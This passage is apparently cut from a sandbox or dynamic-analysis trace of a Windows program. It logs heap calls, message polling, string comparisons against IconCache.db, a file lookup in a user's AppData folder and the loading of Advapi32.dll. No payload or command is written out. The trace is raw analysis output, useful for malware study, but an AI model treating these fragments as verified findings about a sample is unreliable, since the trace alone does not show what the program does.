dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0242.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0242.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0242.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0242.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0242.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0242.842] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0242.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0242.842] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0242.842] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0242.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0242.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0242.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0242.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0242.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0242.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0242.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0242.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0242.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0242.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0242.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0242.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0242.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0242.843] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IconCache.db", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0242.843] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="conCache.db", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0242.843] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="onCache.db", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0242.843] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nCache.db", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0242.843] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache.db", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0242.843] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ache.db", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0242.843] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="che.db", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0242.843] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="he.db", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0242.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0242.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0242.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0242.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0242.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0242.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0242.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0242.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0242.844] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0242.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0242.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0242.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0242.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0242.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0242.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0242.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0242.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0242.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0242.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0242.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0242.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0242.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0242.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0242.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0242.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0242.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0242.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0242.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1a) returned 0x24b3bf0 [0242.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0242.845] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IconCache.db", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0242.845] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="conCache.db", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0242.845] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="onCache.db", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0242.845] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nCache.db", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0242.845] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache.db", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0242.845] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ache.db", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0242.845] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="che.db", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0242.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0242.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0242.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0242.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0242.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0242.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0242.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0242.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0242.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0242.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0242.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0242.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0242.846] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0242.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0242.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0242.846] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0242.846] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0242.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0242.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0242.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4f0 [0242.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0242.846] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0242.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0242.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0242.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa78 [0242.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0242.846] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0242.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0242.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0242.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0242.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0242.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0242.847] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0242.847] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.847] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0242.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0242.847] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0242.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0242.847] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0242.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0242.847] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0242.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0242.848] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/IconCache.db", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x28f14980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f14980, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2b9fc540, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x126775, dwReserved0=0x2f0530, dwReserved1=0x914f, cFileName="IconCache.db", cAlternateFileName="ICONCA~1.DB")) returned 0xaa5760 [0242.848] FindClose (in: hFindFile=0xaa5760 | out: hFindFile=0xaa5760) returned 1 [0242.848] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0242.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0242.848] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0242.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0242.848] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0242.848] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0242.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0242.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0242.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0242.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0242.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0242.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0242.849] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0242.849] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0242.849] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0242.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0242.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0242.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0242.849] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0242.849] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0242.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0242.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0242.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0242.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0242.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0242.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0242.849] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0242.850] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0242.850] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0242.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0242.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0242.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0242.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0242.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0242.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0242.850] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0242.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0242.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0242.850] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0242.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0242.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0242.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0242.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0242.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0242.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0242.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0242.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0242.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0242.851] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0242.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0242.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0242.851] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0242.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0242.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0242.851] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0242.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0242.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0242.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0242.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1858 [0242.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0242.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0242.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0242.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0242.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa778 [0242.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0242.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0242.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0242.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0242.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0242.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0242.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0242.852] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0242.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0242.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0242.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0242.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0242.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0242.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0242.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0242.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0242.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0242.852] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0242.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0242.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0242.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0242.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0242.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0242.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0242.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0242.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0242.853] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0242.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0242.853] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0242.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0242.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0242.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0242.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0242.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0242.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0242.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0242.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0242.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0242.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0242.853] RtlAllocateHeap (HeapHandle=0x25c0000, 